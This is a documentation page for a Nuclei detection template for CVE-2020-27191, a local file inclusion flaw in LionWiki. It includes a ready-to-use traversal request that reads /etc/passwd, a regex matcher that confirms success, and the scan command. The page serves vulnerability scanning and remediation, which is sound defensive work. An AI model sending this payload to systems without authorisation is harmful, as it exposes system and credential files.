Skip to content
Nuclei Templates

LionWiki <3.2.12 - Local File Inclusion

ID: CVE-2020-27191

Severity: high

Author: 0x_Akoko

Tags: cve2020,cve,lionwiki,lfi,oss

Description

Section titled “Description”

LionWiki before 3.2.12 allows an unauthenticated user to read files as the web server user via crafted strings in the index.php f1 variable, aka local file inclusion.

YAML Source

Section titled “YAML Source”
id: CVE-2020-27191


info:
  name: LionWiki <3.2.12 - Local File Inclusion
  author: 0x_Akoko
  severity: high
  description: LionWiki before 3.2.12 allows an unauthenticated user to read files as the web server user via crafted strings in the index.php f1 variable, aka local file inclusion.
  impact: |
    An attacker can exploit this vulnerability to access sensitive information, such as configuration files, credentials, or other sensitive data.
  remediation: |
    Upgrade LionWiki to version 3.2.12 or later to mitigate the LFI vulnerability.
  reference:
    - https://www.junebug.site/blog/cve-2020-27191-lionwiki-3-2-11-lfi
    - http://lionwiki.0o.cz/index.php?page=Main+page
    - https://nvd.nist.gov/vuln/detail/CVE-2020-27191
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2020-27191
    cwe-id: CWE-22
    epss-score: 0.01572
    epss-percentile: 0.86986
    cpe: cpe:2.3:a:lionwiki:lionwiki:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: lionwiki
    product: lionwiki
  tags: cve2020,cve,lionwiki,lfi,oss


http:
  - method: GET
    path:
      - "{{BaseURL}}/index.php?page=&action=edit&f1=.//./\\.//./\\.//./\\.//./\\.//./\\.//./etc/passwd&restore=1"


    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:[x*]:0:0:"


      - type: status
        status:
          - 200
# digest: 4a0a0047304502205040b075086b3d02858469c31cc0748d34d246860b244c5d7bac0aad8ac913dc0221008f33e9f70ea26528b70e88710959a676d0c5d60a2b3672e6d8910285b5da8f01:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2020/CVE-2020-27191.yaml"

View on Github